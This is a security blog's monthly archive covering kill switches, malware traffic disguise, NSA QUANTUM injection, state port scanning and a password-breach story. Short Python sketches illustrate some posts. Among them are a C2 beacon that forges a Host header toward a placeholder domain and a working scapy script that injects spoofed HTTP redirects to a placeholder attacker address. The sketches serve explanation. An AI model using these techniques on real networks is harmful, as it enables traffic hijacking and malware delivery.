Blog: August 2014 Archives

Cell Phone Kill Switches Mandatory in California

California passed a kill-switch law, meaning that all cell phones sold in California must have the capability to be remotely turned off. It was sold as an antitheft measure. If the phone company could remotely render a cell phone inoperative, there would be less incentive to steal one.

I worry more about the side effects: once the feature is in place, it can be used by all sorts of people for all sorts of reasons.

The law raises concerns about how the switch might be used or abused, because it also provides law enforcement with the authority to use the feature to kill phones. And any feature accessible to consumers and law enforcement could be accessible to hackers, who might use it to randomly kill phones for kicks or revenge, or to perpetrators of crimes who might—depending on how the kill switch is implemented—be able to use it to prevent someone from calling for help.

“It’s great for the consumer, but it invites a lot of mischief,” says Hanni Fakhoury, staff attorney for the Electronic Frontier Foundation, which opposes the law. “You can imagine a domestic violence situation or a stalking context where someone kills [a victim’s] phone and prevents them from calling the police or reporting abuse. It will not be a surprise when you see it being used this way.”

I wrote about this in 2008, more generally:

The possibilities are endless, and very dangerous. Making this work involves building a nearly flawless hierarchical system of authority. That’s a difficult security problem even in its simplest form. Distributing that system among a variety of different devices—computers, phones, PDAs, cameras, recorders—with different firmware and manufacturers, is even more difficult. Not to mention delegating different levels of authority to various agencies, enterprises, industries and individuals, and then enforcing the necessary safeguards.

Once we go down this path—giving one device authority over other devices—the security problems start piling up. Who has the authority to limit functionality of my devices, and how do they get that authority? What prevents them from abusing that power? Do I get the ability to override their limitations? In what circumstances, and how? Can they override my override?
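
Even the simplest piece of this, verifying that a kill command really comes from an authorized party, presupposes answers to all of those questions. Here is a minimal sketch of that one piece, assuming Python's cryptography package and a hypothetical single-authority design; everything hard lives outside these few lines:

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

    # Hypothetical single-authority design: one signing key. Held by whom?
    authority_key = Ed25519PrivateKey.generate()
    AUTHORITY_PUBKEY = authority_key.public_key()

    def accept_kill_command(command: bytes, signature: bytes) -> bool:
        """Accept a kill command only if the trusted authority signed it.

        The signature check is the easy part; who holds the key, how
        authority is delegated, and whether the owner can override it
        are the hard parts described above.
        """
        try:
            AUTHORITY_PUBKEY.verify(signature, command)
            return True
        except InvalidSignature:
            return False

    # Example: the authority signs a command and the phone verifies it.
    cmd = b"disable IMEI 012345678901234"
    assert accept_kill_command(cmd, authority_key.sign(cmd))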

The law only affects California, but phone manufacturers won’t build one phone for California and another for everyone else. This means that all cell phones will eventually have this capability. And, of course, the procedural controls and limitations written into the California law don’t apply elsewhere.

EDITED TO ADD (9/12): Users can opt out, at least for now: “The bill would authorize an authorized user to affirmatively elect to disable or opt-out of the technological solution at any time.”

How the bill can be used to disrupt protests.

Posted on August 29, 2014 at 12:31 PM • 59 Comments

ISIS Threatens US with Terrorism

They’re openly mocking our profiling.

But in several telephone conversations with a Reuters reporter over the past few months, Islamic State fighters had indicated that their leader, Iraqi Abu Bakr al-Baghdadi, had several surprises in store for the West.

They hinted that attacks on American interests or even U.S. soil were possible through sleeper cells in Europe and the United States.

“The West are idiots and fools. They think we are waiting for them to give us visas to go and attack them or that we will attack with our beards or even Islamic outfits,” said one.

“They think they can distinguish us these days; they are fools and more than that they don’t know we can play their game in intelligence. They infiltrated us with those who pretend to be Muslims and we have also penetrated them with those who look like them.”

I am reminded of my debate on airport profiling with Sam Harris, particularly my initial response to his writings.

Posted on August 29, 2014 at 6:08 AM • 76 Comments

Hacking Traffic Lights

New paper: “Green Lights Forever: Analyzing the Security of Traffic Infrastructure,” Branden Ghena, William Beyer, Allen Hillaker, Jonathan Pevarnek, and J. Alex Halderman.

Abstract: The safety critical nature of traffic infrastructure requires that it be secure against computer-based attacks, but this is not always the case. We investigate a networked traffic signal system currently deployed in the United States and discover a number of security flaws that exist due to systemic failures by the designers. We leverage these flaws to create attacks which gain control of the system, and we successfully demonstrate them on the deployment in coordination with authorities. Our attacks show that an adversary can control traffic infrastructure to cause disruption, degrade safety, or gain an unfair advantage. We make recommendations on how to improve existing systems and discuss the lessons learned for embedded systems security in general.

News article.

Posted on August 28, 2014 at 6:14 AM • 16 Comments

People Are Not Very Good at Matching Photographs to People

We have an error rate of about 15%:

Professor Mike Burton, Sixth Century Chair in Psychology at the University of Aberdeen, said: “Psychologists identified around a decade ago that in general people are not very good at matching a person to an image on a security document.

“Familiar faces trigger special processes in our brain—we would recognise a member of our family, a friend or a famous face within a crowd, in a multitude of guises, venues, angles or lighting conditions. But when it comes to identifying a stranger it’s another story.

“The question we asked was does this fundamental brain process that occurs have any real importance for situations such as controlling passport issuing, and we found that it does.”

The ability of Australian passport officers, for whom accurate face matching is central to their job and vital to border security, was tested in the latest study, which involved researchers from the Universities of Aberdeen, York and New South Wales Australia.

In one test, passport officers had to decide whether or not a photograph of an individual presented on their computer screen matched the face of a person standing in front of their desk.

It was found that on 15% of trials the officers decided that the photograph on their screen matched the face of the person standing in front of them, when in fact, the photograph showed an entirely different person.

Posted on August 25, 2014 at 7:08 AM • 29 Comments

Friday Squid Blogging: Squid Boats Illuminate Bangkok from Space

Really:

To attract the phytoplankton, fishermen suspend green lights from their boats to illuminate the sea. When the squid chase after their dinner, they’re drawn closer to the surface, making it easier for fishermen to net them. Squid boats often carry up to 100 of these green lamps, which generate hundreds of kilowatts of electricity—making them visible, it appears, even from space.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Posted on August 22, 2014 at 4:49 PM • 144 Comments

Disguising Exfiltrated Data

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[…]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and redirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured so that anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.
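
To make the mechanics concrete, here is a minimal sketch of the two tricks just described: a rendezvous name whose A record the operator can repoint at will, plus a forged Host header so the traffic looks legitimate on the wire. The zone name and path are hypothetical placeholders.

    import socket
    import http.client

    # Hypothetical zone registered with a free hosted-DNS service; the
    # registrant can repoint its A record to any IP address, at any time.
    C2_NAME = "files.example-registered-zone.net"

    # Resolve whatever A record the operator has currently set.
    c2_ip = socket.gethostbyname(C2_NAME)

    # Talk to that IP, but forge a Host header naming a legitimate domain
    # so the HTTP traffic superficially resembles an ordinary update check.
    conn = http.client.HTTPConnection(c2_ip, 80, timeout=10)
    conn.request("GET", "/update", headers={"Host": "update.adobe.com"})
    print(conn.getresponse().status)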

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

Posted on August 21, 2014 at 6:08 AM • 24 Comments

US Air Force is Focusing on Cyber Deception

The US Air Force is focusing on cyber deception next year:

Background: Deception is a deliberate act to conceal activity on our networks, create uncertainty and confusion against the adversary’s efforts to establish situational awareness and to influence and misdirect adversary perceptions and decision processes. Military deception is defined as “those actions executed to deliberately mislead adversary decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission.” Military forces have historically used techniques such as camouflage, feints, chaff, jammers, fake equipment, false messages or traffic to alter an enemy’s perception of reality. Modern day military planners need a capability that goes beyond the current state-of-the-art in cyber deception to provide a system or systems that can be employed by a commander when needed to enable deception to be inserted into defensive cyber operations.

Relevance and realism are the grand technical challenges to cyber deception. The application of the proposed technology must be relevant to operational and support systems within the DoD. The DoD operates within a highly standardized environment. Any technology that significantly disrupts or increases the cost to the standard of practice will not be adopted. If the technology is adopted, the defense system must appear legitimate to the adversary trying to exploit it.

Objective: To provide cyber-deception capabilities that could be employed by commanders to provide false information, confuse, delay, or otherwise impede cyber attackers to the benefit of friendly forces. Deception mechanisms must be incorporated in such a way that they are transparent to authorized users, and must introduce minimal functional and performance impacts, in order to disrupt our adversaries and not ourselves. As such, proposed techniques must consider how challenges relating to transparency and impact will be addressed. The security of such mechanisms is also paramount, so that their power is not co-opted by attackers against us for their own purposes. These techniques are intended to be employed for defensive purposes only on networks and systems controlled by the DoD.

Advanced techniques are needed with a focus on introducing varying deception dynamics in network protocols and services which can severely impede, confound, and degrade an attacker’s methods of exploitation and attack, thereby increasing the costs and limiting the benefits gained from the attack. The emphasis is on techniques that delay the attacker in the reconnaissance through weaponization stages of an attack and also aid defenses by forcing an attacker to move and act in a more observable manner. Techniques across the host and network layers or a hybrid thereof are of interest in order to provide AF cyber operations with effective, flexible, and rapid deployment options.
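
A trivial member of the genre is the decoy service: present a plausible banner, waste the attacker’s time, and log the probe. This toy sketch uses Python’s standard library; the port and banner are arbitrary choices of mine, not anything from the solicitation.

    import socketserver
    from datetime import datetime, timezone

    class DecoySSH(socketserver.BaseRequestHandler):
        """Advertise a plausible SSH banner, then log whatever the client sends."""

        def handle(self):
            stamp = datetime.now(timezone.utc).isoformat()
            print(f"{stamp} probe from {self.client_address[0]}")
            self.request.sendall(b"SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2\r\n")
            print(f"{stamp} client banner: {self.request.recv(1024)!r}")

    if __name__ == "__main__":
        with socketserver.TCPServer(("0.0.0.0", 2222), DecoySSH) as server:
            server.serve_forever()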

More discussion here.

Posted on August 20, 2014 at 5:08 AM • 41 Comments

The Security of al Qaeda Encryption Software

The web intelligence firm Recorded Future has posted two stories about how al Qaeda is using new encryption software in response to the Snowden disclosures. NPR picked up the story a week later.

Former NSA General Counsel Stewart Baker uses this as evidence that Snowden has harmed America. Glenn Greenwald calls this “CIA talking points” and shows that al Qaeda was using encryption well before Snowden. Both quote me heavily, Baker casting me as somehow disingenuous on this topic.

Baker is conflating two cryptography truisms that I often state. The first is that cryptography is hard, and you’re much better off using well-tested public algorithms than trying to roll your own. The second is that cryptographic implementation is hard, and you’re much better off using well-tested open-source encryption software than trying to roll your own. Admittedly, the two are very similar, and sometimes I’m not as precise as I should be when talking to reporters.
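
To put the second truism in code: a few lines calling a well-tested open-source library buy you authenticated encryption that a home-brew design almost never matches. A sketch using Python’s cryptography package as one example of such a library:

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()   # vetted random key generation
    f = Fernet(key)
    token = f.encrypt(b"meet at the usual place")  # AES plus HMAC, done correctly
    assert f.decrypt(token) == b"meet at the usual place"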

This is what I wrote in May:

I think this will help US intelligence efforts. Cryptography is hard, and the odds that a home-brew encryption product is better than a well-studied open-source tool are slight. Last fall, Matt Blaze said to me that he thought that the Snowden documents will usher in a new dark age of cryptography, as people abandon good algorithms and software for snake oil of their own devising. My guess is that this is an example of that.

Note the phrase “good algorithms and software.” My intention was to invoke both truisms in the same sentence. That paragraph is true if al Qaeda is rolling its own encryption algorithms, as Recorded Future reported in May. And it remains true if al Qaeda is using algorithms like my own Twofish and rolling its own software, as Recorded Future reported earlier this month. Everything we know about how the NSA breaks cryptography suggests that it attacks the implementations far more successfully than the algorithms.

My guess is that in this case they don’t even bother with the encryption software; they just attack the users’ computers. There’s nothing that screams “hack me” more than using specially designed al Qaeda encryption software. There’s probably a QUANTUMINSERT attack and FOXACID exploit already set on automatic fire.

I don’t want to get into an argument about whether al Qaeda is altering its security in response to the Snowden documents. Its members would be idiots if they did not, but it’s also clear that they were designing their own cryptographic software long before Snowden. My guess is that the smart ones are using public tools like OTR and PGP and the paranoid dumb ones are using their own stuff, and that the split was the same both pre- and post-Snowden.

Posted on August 19, 2014 at 6:11 AM • 33 Comments

QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.
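
To give a flavor of how an AirPwn-style injection works: whoever sees a request first can race the real server, forging a response that carries the right sequence numbers. A rough sketch using the scapy library; the redirect target is a placeholder, and running anything like this requires root and a privileged vantage point on the network.

    from scapy.all import IP, TCP, Raw, send, sniff

    # Placeholder attacker-controlled landing page.
    REDIRECT = b"HTTP/1.1 302 Found\r\nLocation: http://203.0.113.7/\r\n\r\n"

    def inject(pkt):
        ip, tcp = pkt[IP], pkt[TCP]
        # Forge the server's reply: swap the endpoints, and pick sequence and
        # acknowledgment numbers that continue the client's connection.
        reply = (IP(src=ip.dst, dst=ip.src) /
                 TCP(sport=tcp.dport, dport=tcp.sport, flags="PA",
                     seq=tcp.ack, ack=tcp.seq + len(pkt[Raw].load)) /
                 Raw(REDIRECT))
        send(reply, verbose=False)  # if this beats the real server, it wins

    sniff(filter="tcp port 80", store=False, prn=inject,
          lfilter=lambda p: p.haslayer(Raw) and p[Raw].load.startswith(b"GET "))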

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google—YouTube is specifically mentioned—and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies—somehow related to the cyberweapons arms manufacturer Gamma International—just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA—and GCHQ and CSEC—are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Deibert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Posted on August 18, 2014 at 11:14 AM • 31 Comments

NSA/GCHQ/CSEC Infecting Innocent Computers Worldwide

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the GCHQ slide from 2009, they’ve completed port scans of 27 different countries and are prepared to do more.
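
There is nothing exotic about the scanning itself; the building block is an ordinary TCP connect probe, repeated at national scale. A minimal sketch (the address below is a placeholder from a reserved test range):

    import socket

    def tcp_open(host: str, port: int, timeout: float = 0.5) -> bool:
        """One connect() probe: the basic unit of a country-wide port scan."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    for port in (22, 80, 443):
        print(port, tcp_open("192.0.2.1", port))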

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CSEC talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CSEC discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only do these intelligence services want an insecure Internet so they can attack each other, they want an insecure Internet so they can use innocent third parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission—these documents sure look like the sorts of things that come from the Snowden archive—or if there is yet another leaker.

Posted on August 18, 2014 at 5:45 AM • 60 Comments

New Snowden Interview in Wired

There’s a new article on Edward Snowden in Wired. It’s written by longtime NSA watcher James Bamford, who interviewed Snowden in Moscow.

There’s lots of interesting stuff in the article, but I want to highlight two new revelations. One is that the NSA was responsible for a 2012 Internet blackout in Syria:

One day an intelligence officer told him that TAO—a division of NSA hackers—had attempted in 2012 to remotely install an exploit in one of the core routers at a major Internet service provider in Syria, which was in the midst of a prolonged civil war. This would have given the NSA access to email and other Internet traffic from much of the country. But something went wrong, and the router was bricked instead—rendered totally inoperable. The failure of this router caused Syria to suddenly lose all connection to the Internet—although the public didn’t know that the US government was responsible….

Inside the TAO operations center, the panicked government hackers had what Snowden calls an “oh shit” moment. They raced to remotely repair the router, desperate to cover their tracks and prevent the Syrians from discovering the sophisticated infiltration software used to access the network. But because the router was bricked, they were powerless to fix the problem.

Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage. Back at TAO’s operations center, the tension was broken with a joke that contained more than a little truth: “If we get caught, we can always point the finger at Israel.”

Other articles on Syria.

The other is something called MONSTERMIND, which is an automatic strike-back system for cyberattacks.

The program, disclosed here for the first time, would automate the process of hunting for the beginnings of a foreign cyberattack. Software would constantly be on the lookout for traffic patterns indicating known or suspected attacks. When it detected an attack, MonsterMind would automatically block it from entering the country—a “kill” in cyber terminology.

Programs like this had existed for decades, but MonsterMind software would add a unique new capability: Instead of simply detecting and killing the malware at the point of entry, MonsterMind would automatically fire back, with no human involvement.
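
The detect-and-block half is familiar technology; every inline intrusion-prevention system does something like the toy sketch below, where the signatures and the firewall response are placeholders of mine. What is new, and alarming, is the automated fire-back step, which nothing here attempts.

    import subprocess

    SIGNATURES = [b"\x90" * 16, b"../../etc/passwd"]  # toy attack indicators

    def inspect(payload: bytes, src_ip: str) -> None:
        """Detect a known pattern, then "kill" it by dropping the source."""
        if any(sig in payload for sig in SIGNATURES):
            subprocess.run(
                ["iptables", "-A", "INPUT", "-s", src_ip, "-j", "DROP"],
                check=False)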

A bunch more articles and stories on MONSTERMIND.

And there’s this 2011 photo of Snowden and former NSA Director Michael Hayden.

Posted on August 14, 2014 at 1:02 AM • 86 Comments

Security as Interface Guarantees

This is a smart and interesting blog post:

I prefer to think of security as a class of interface guarantee. In particular, security guarantees are a kind of correctness guarantee. At every interface of every kind—user interface, programming language syntax and semantics, in-process APIs, kernel APIs, RPC and network protocols, ceremonies—explicit and implicit design guarantees (promises, contracts) are in place, and determine the degree of “security” (however defined) the system can possibly achieve.

Design guarantees might or might not actually hold in the implementation—software tends to have bugs, after all. Callers and callees can sometimes (but not always) defend themselves against untrustworthy callees and callers (respectively) in various ways that depend on the circumstances and on the nature of caller and callee. In this sense an interface is an attack surface—but properly constructed, it can also be a defense surface.

[…]

But also it’s an attempt to re-frame security engineering in a way that allows us to imagine more and better solutions to security problems. For example, when you frame your interface as an attack surface, you find yourself ever-so-slightly in a panic mode, and focus on how to make the surface as small as possible. Inevitably, this tends to lead to cat-and-mouseism and poor usability, seeming to reinforce the false dichotomy. If the panic is acute, it can even lead to nonsensical and undefendable interfaces, and a proliferation of false boundaries (as we saw with Windows UAC).

If instead we frame an interface as a defense surface, we are in a mindset that allows us to treat the interface as a shield: built for defense, testable, tested, covering the body; but also light-weight enough to carry and use effectively. It might seem like a semantic game; but in my experience, thinking of a boundary as a place to build a point of strength rather than thinking of it as something that must inevitably fall to attack leads to solutions that in fact withstand attack better while also functioning better for friendly callers.
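
One way to see the defense-surface idea in code is to state an interface’s guarantees explicitly and enforce them at the boundary, rather than hoping callers behave. A small illustrative example:

    def set_display_name(raw: str) -> str:
        """Guarantee to the rest of the system: the returned name is a
        printable, trimmed string of 1 to 64 characters. Enforced here,
        at the boundary, so that callees never need to re-check.
        """
        if not isinstance(raw, str):
            raise TypeError("display name must be a string")
        name = raw.strip()
        if not 1 <= len(name) <= 64:
            raise ValueError("display name must be 1 to 64 characters")
        if not name.isprintable():
            raise ValueError("display name must be printable")
        return name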

I also liked the link at the end.

Posted on August 13, 2014 at 2:11 PM • 19 Comments

Automatic Scanning for Highly Stressed Individuals

This borders on ridiculous:

Chinese scientists are developing a mini-camera to scan crowds for highly stressed individuals, offering law-enforcement officers a potential tool to spot would-be suicide bombers.

[…]

“They all looked and behaved as ordinary people but their level of mental stress must have been extremely high before they launched their attacks. Our technology can detect such people, so law enforcement officers can take precautions and prevent these tragedies,” Chen said.

Officers looking through the device at a crowd would see a mental “stress bar” above each person’s head, and the suspects highlighted with a red face.

The researchers said they were able to use the technology to distinguish high blood-oxygen levels produced by stress from those produced by mere physical exertion.

I’m not optimistic about this technology.

Posted on August 13, 2014 at 6:20 AM • 60 Comments

Irrational Fear of Risks Against Our Children

There’s a horrible story of a South Carolina mother arrested for letting her 9-year-old daughter play alone at a park while she was at work. The article linked to another article about a woman convicted of “contributing to the delinquency of a minor” for leaving her 4-year-old son in the car for a few minutes. That article contains some excellent commentary by the very sensible Free Range Kids blogger Lenore Skenazy:

“Listen,” she said at one point. “Let’s put aside for the moment that by far, the most dangerous thing you did to your child that day was put him in a car and drive someplace with him. About 300 children are injured in traffic accidents every day—and about two die. That’s a real risk. So if you truly wanted to protect your kid, you’d never drive anywhere with him. But let’s put that aside. So you take him, and you get to the store where you need to run in for a minute and you’re faced with a decision. Now, people will say you committed a crime because you put your kid ‘at risk.’ But the truth is, there’s some risk to either decision you make.” She stopped at this point to emphasize, as she does in much of her analysis, how shockingly rare the abduction or injury of children in non-moving, non-overheated vehicles really is. For example, she insists that statistically speaking, it would likely take 750,000 years for a child left alone in a public space to be snatched by a stranger. “So there is some risk to leaving your kid in a car,” she argues. It might not be statistically meaningful, but it’s not nonexistent. “The problem is,” she goes on, “there’s some risk to every choice you make. So, say you take the kid inside with you. There’s some risk you’ll both be hit by a crazy driver in the parking lot. There’s some risk someone in the store will go on a shooting spree and shoot your kid. There’s some risk he’ll slip on the ice on the sidewalk outside the store and fracture his skull. There’s some risk no matter what you do. So why is one choice illegal and one is OK? Could it be because the one choice inconveniences you, makes your life a little harder, makes parenting a little harder, gives you a little less time or energy than you would have otherwise had?”

Later on in the conversation, Skenazy boils it down to this. “There’s been this huge cultural shift. We now live in a society where most people believe a child can not be out of your sight for one second, where people think children need constant, total adult supervision. This shift is not rooted in fact. It’s not rooted in any true change. It’s imaginary. It’s rooted in irrational fear.”

Skenazy has some choice words about the South Carolina story as well:

But, “What if a man would’ve come and snatched her?” said a woman interviewed by the TV station.

To which I must ask: In broad daylight? In a crowded park? Just because something happened on Law & Order doesn’t mean it’s happening all the time in real life. Make “what if?” thinking the basis for an arrest and the cops can collar anyone. “You let your son play in the front yard? What if a man drove up and kidnapped him?” “You let your daughter sleep in her own room? What if a man climbed through the window?” etc.

These fears pop into our brains so easily, they seem almost real. But they’re not. Our crime rate today is back to what it was when gas was 29 cents a gallon, according to The Christian Science Monitor. It may feel like kids are in constant danger, but they are as safe (if not safer) than we were when our parents let us enjoy the summer outside, on our own, without fear of being arrested.

Yes.

Posted on August 11, 2014 at 9:34 AM • 92 Comments

Eavesdropping by Visual Vibrations

Researchers are able to recover sound through soundproof glass by recording the vibrations of a plastic bag.

Researchers at MIT, Microsoft, and Adobe have developed an algorithm that can reconstruct an audio signal by analyzing minute vibrations of objects depicted in video. In one set of experiments, they were able to recover intelligible speech from the vibrations of a potato-chip bag photographed from 15 feet away through soundproof glass.

In other experiments, they extracted useful audio signals from videos of aluminum foil, the surface of a glass of water, and even the leaves of a potted plant.

This isn’t a new idea. I remember military security policies requiring people to close the window blinds to prevent someone from shining a laser on the window and recovering the sound from the vibrations. But both the camera and processing technologies are getting better.
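
The paper tracks sub-pixel phase changes in high-speed video, but a crude caricature shows the principle: even the mean brightness of a patch of video wobbles as the object vibrates, and that wobble is a signal sampled at the frame rate. A toy sketch, assuming NumPy and a grayscale clip:

    import numpy as np

    def frames_to_signal(frames: np.ndarray) -> np.ndarray:
        """frames: array of shape (n_frames, height, width).

        Returns a normalized motion signal sampled at the camera frame
        rate. The real algorithm is far subtler (local phase, multiple
        orientations), but the principle is the same: tiny vibrations
        modulate the image.
        """
        signal = frames.reshape(len(frames), -1).mean(axis=1)
        signal = signal - signal.mean()  # remove the static component
        return signal / (np.abs(signal).max() + 1e-12)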

News story.

Posted on August 8, 2014 at 11:50 AM • 25 Comments

The US Intelligence Community has a Third Leaker

Ever since the Intercept published this story about the US government’s Terrorist Screening Database, the press has been writing about a “second leaker”:

The Intercept article focuses on the growth in U.S. government databases of known or suspected terrorist names during the Obama administration.

The article cites documents prepared by the National Counterterrorism Center dated August 2013, which is after Snowden left the United States to avoid criminal charges.

Greenwald has suggested there was another leaker. In July, he said on Twitter “it seems clear at this point” that there was another.

Everyone’s miscounting. This is the third leaker:

  • Leaker #1: Edward Snowden.
  • Leaker #2: The person who is passing secrets to Jake Appelbaum, Laura Poitras and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. I have also heard privately that the NSA knows that this is a second leaker.
  • Leaker #3: This new leaker, with access to a different stream of information (the NCTC is not the NSA), whom the Intercept calls “a source in the intelligence community.”

Harvard Law School professor Yochai Benkler has written an excellent law-review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing.

Posted on August 7, 2014 at 12:14 PM • 53 Comments

Over a Billion Passwords Stolen?

I’ve been doing way too many media interviews over this weird New York Times story that a Russian criminal gang has stolen over 1.2 billion passwords.

As expected, the hype is pretty high over this. But from the beginning, the story didn’t make sense to me. There are obvious details missing: are the passwords in plaintext or encrypted, what sites are they for, how did they end up with a single criminal gang? The Milwaukee company that pushed this story, Hold Security, isn’t a company that I had ever heard of before. (I was with Howard Schmidt when I first heard this story. He lives in Wisconsin, and he had never heard of the company before, either.) The New York Times writes that “a security expert not affiliated with Hold Security analyzed the database of stolen credentials and confirmed it was authentic,” but we’re not given any details. This felt more like a PR story from the company than anything real.

Yesterday, Forbes wrote that Hold Security is charging people $120 to tell them if they’re in the stolen-password database:

“In addition to continuous monitoring, we will also check to see if your company has been a victim of the latest CyberVor breach,” says the site’s description of the service using its pet name for the most recent breach. “The service starts from as low as 120$/month and comes with a 2-week money back guarantee, unless we provide any data right away.”

Shortly after Wall Street Journal reporter Danny Yadron linked to the page on Twitter and asked questions about it, the firm replaced the description of the service with a “coming soon” message.

Holden says by email that the service will actually be $10/month and $120/year. “We are charging this symbolical fee to recover our expense to verify the domain or website ownership,” he says by email. “While we do not anticipate any fraud, we need to be cognizant of its potential. The other thing to consider, the cost that our company must undertake to proactively reach out to a company to identify the right individual(s) to inform of a breach, prove to them that we are the ‘good guys’. Believe it or not, it is a hard and often thankless task.”

This story is getting squirrelier and squirrelier. Yes, security companies love to hype the threat to sell their products and services. But this goes further: single-handedly trying to create a panic, and then profiting off that panic.

I don’t know how much of this story is true, but what I was saying to reporters over the past two days is that it’s evidence of how secure the Internet actually is. We’re not seeing massive fraud or theft. We’re not seeing massive account hijacking. A gang of Russian hackers has 1.2 billion passwords—they’ve probably had most of them for a year or more—and everything is still working normally. This sort of thing is pretty much universally true. You probably have a credit card in your wallet right now whose number has been stolen. There are zero-day vulnerabilities being discovered right now that can be used to hack your computer. Security is terrible everywhere, and yet it’s all okay. This is a weird paradox that we’re used to by now.

Oh, and if you want to change your passwords, here’s my advice.
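
As a generic illustration, independent of that advice: any modern language can pull a strong random password from the operating system’s entropy source, which beats anything a human invents.

    import secrets
    import string

    def random_password(length: int = 20) -> str:
        """Draw each character independently from the OS's cryptographic RNG."""
        alphabet = string.ascii_letters + string.digits + string.punctuation
        return "".join(secrets.choice(alphabet) for _ in range(length))

    print(random_password())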

EDITED TO ADD (8/7): Brian Krebs vouches for Hold Security. On the other hand, it had no web presence until this story hit. Despite Krebs, I’m skeptical.

EDITED TO ADD (8/7): Here’s an article about Hold Security from February with suspiciously similar numbers.

EDITED TO ADD (8/9): Another skeptical take.

Posted on August 7, 2014 at 7:45 AM • 57 Comments

Former NSA Director Patenting Computer Security Techniques

Former NSA Director Keith Alexander is patenting a variety of techniques to protect computer networks. We’re supposed to believe that he developed these on his own time and they have nothing to do with the work he did at the NSA, except for the parts where they obviously did and therefore are worth $1 million per month for companies to license.

No, nothing fishy here.

EDITED TO ADD (8/14): Some more commentary.

Posted on August 4, 2014 at 6:26 AM • 44 Comments
